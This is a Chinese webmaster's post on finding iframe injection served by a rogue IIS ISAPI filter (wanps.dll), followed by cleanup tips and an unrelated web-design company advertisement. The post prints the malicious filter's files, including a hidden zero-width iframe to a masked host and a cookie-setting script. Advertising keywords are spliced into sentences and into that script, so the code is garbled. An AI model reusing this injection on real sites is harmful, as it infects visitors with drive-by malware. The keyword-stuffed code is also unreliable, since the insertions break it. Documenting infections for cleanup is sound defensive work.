最近实在头疼,我的网站www.haorx.com,反复网店设计案例 被一个www.17aq.com的网站挂马,一打开网站后,马上就会要你安装一个什么软件,我打开17aq的网站,准备查一下联系方式,告诉人家别在我的网站上挂马。但人家根本就没有页面,显然是一个挂马的网站,怎么办(请各位看官给我支个招)?
下面我说一下,我找这个马的过程:
现象是一台服务器几乎所有网站打开网页 甚至HTML网页 都出现了
《iframe src=http://www.XXXXXXXXXXXXX.com/mmmmmmm.htm width=0》《/iframe》 这种样式的代码 一般在头部部分杀毒软件打开会报毒
打开HTML或ASP PHP页面在源码中怎么也找不到这段代码起初会怀疑是JS,找了半天还是没有发现,连新建的HTML页面也会有这段代码~
仔细寻找问题应该在IIS上,打开IIS重新启动一次在主IIS上右键属性-----ISAPI,发现一个ISAPI扩展,没见过的,路径为:c:\windows\help\wanps.dll ,ISAP加载正常绿色状态,取消重新启动IIS,所有代码消失。
可以判断就是这个文件在作怪,提取出来就是者三个文件
wanps.ini内容为:
[Filter]
Cookie=GAG5=ABCDEFG
Redirector=C:\windows\help\wanps.txt
wanps.txt内容为:
《body》
《iframe src=http://www.XXXXXX.com/mm.htm width=0》《/iframe》
《script 乌鲁木齐网站建设公司language=javascript》
《!--
var expires = new Date(网站页面设计模板);
expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000);
document.cookie=GAG5=ABCDEFG;expires=+expires.toGMTString();
--》
《/script》
《/body》
打此为此,马算是解决了,但后门肯定已经被人家掌握了,我清除马以后,过一段时间,又被人家挂上马了。哎~~~~
在网上查到一些解决挂马的办法,附上,希望对大家有用
首先发现自己访问多个站点被挂马以后需要按以下流程操作解决
1、迅速访问www.baidu.com看BAIDU是否被挂马,用于排除自己的PC中病毒引起的问题。如果你访问www.baidu.com也是被挂马的话,那你就杀毒就可以了!熊猫烧香好象应用了类似的预防被杀掉的措施。
2、迅速登陆FTP或者进入服务器查看相关文件是否被写入了代码,如果被写入代码那就找规律清除吧,某些黑客用批量文本替换工具挂的马,所以你找到替换字符,替换回来就可以迅速解决。
3、如果以上两个方案都没解决,迅速打开IIS,查看仔细寻找 打开IIS 重新启动一次 在主IIS上 右键属性 ISAPI 发现一个ISAPI扩展 没见过的 ISAP加载正常 绿色状态 取消 重新启动IIS 所有代码消失
4、如果还没有解决,那你就可以放心了,不是你的机器被入侵了,速速告诉企业网站建设机房,和你同一网关下的某机器被拿下来,被设置了ARP欺骗。这个现象就是包括服务器的404页面都被挂了马。你可以在防火墙里设置一些规则来避免掉。我所说的这个方法也是现在最流行的挂马的方法!
南京牧狼文化传媒有限公司简介:
牧狼传媒,牧者之心,狼者之性,以牧之谦卑宽容之心待人,以狼之团结无畏之性做事!
公司注册资金100万,主营众筹全案服务、网站营销全案服务、网站建设、微信小程序开发、电商网店设计、H5页面设计、腾讯社交广告投放以及电商营销推广全案等相关业务,致力于为客户提供更有价值的服务,创造让用户满意的效果!
为百度官方及其大客户、苏宁易购、金山WPS秀堂、美的、创维家电、新东方在线、伊莱克斯、宝丽莱等国内国外知名品牌服务过,服务经验丰富!同时,公司也是南京电子商务协会会员单位、猪八戒网官方认证签约服务商、江苏八戒服务网联盟、南京浦口文化产业联合会会员单位,可以为您提供更好的服务!
主营项目:众筹全案服务、网站营销全案服务、网站建设、微信小程序开发、电商网店设计、H5页面设计、腾讯社交广告投放、竞价托管、网站优化、电商代运营等
合作客户:百度、苏宁易购、饿了么、美的、创维家电、新东方在线、宝丽莱、金山WPS秀堂、伊莱克斯
资质荣誉:百度商业服务市场2017年度最佳图片服务商、南京电子商务协会会员单位、猪八戒网官方认证签约服务商、江苏八戒服务网联盟、南京浦口文化产业联合会会员单位、八戒通TOP服务商、"易拍即合杯"H5创意大赛"三等奖"。